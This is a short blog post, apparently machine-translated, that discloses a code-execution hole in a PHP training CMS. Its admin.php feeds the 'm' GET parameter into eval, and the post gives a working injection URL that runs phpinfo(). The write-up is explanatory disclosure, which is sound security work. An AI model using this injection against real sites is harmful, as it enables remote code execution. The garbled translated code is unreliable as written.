Code execution vulnerability in a CMS example of a PHP Training

The download volume on VeryCD is still quite high. It shows that it is an example provided by the teacher to introduce MVC. From the perspective of development, it is still good. However, for the convenience of the picture, I have neglected some things. Here is an article for notes.
 
What is MVC? In order to achieve a single entry, all the actions (Control) usually start from a file. Let's see how he wrote it here (admin. php In the root directory ):
 
<? PHP
Require ('init. php ');
Eval ('$ action = new'. ucfirst (isset ($ _ GET ["m"])? $ _ GET ["m"]: "index"). "Action ();");
$ Action-> run ();
 
?>
Note: The main function of the init. PHP file contained here is to use the magic method of PHP _ autoload () to automatically load class files. Then, the $ action = new SomeAction (); statement is followed to instantiate an entity class. But unfortunately, he directly used the eval function for the convenience of the graph.
 
The famous saying "any input is harmful" is shining at the moment ~
 
The characters after new are passed in through the GET method. Here, the data input is controlled by me, so we can request
 
Admin. php? M = xxxxx www.2cto.com
 
Then use your evil imagination to do something evil.
 
At the same time, we found a class named UserModel. We can construct it like this.
 
Admin. php? M = UserModel (); phpinfo ();//
 
So the statements we run in eval become
 
$ Action = new UserModel (); phpinfo (); // Action ();
 
The code execution is so generated. The repair method will be discussed next time. I just think that the training institution will have a similar tutorial program ctrl + c or ctrl + v. Hv fun


From DarkRay's BLoG .!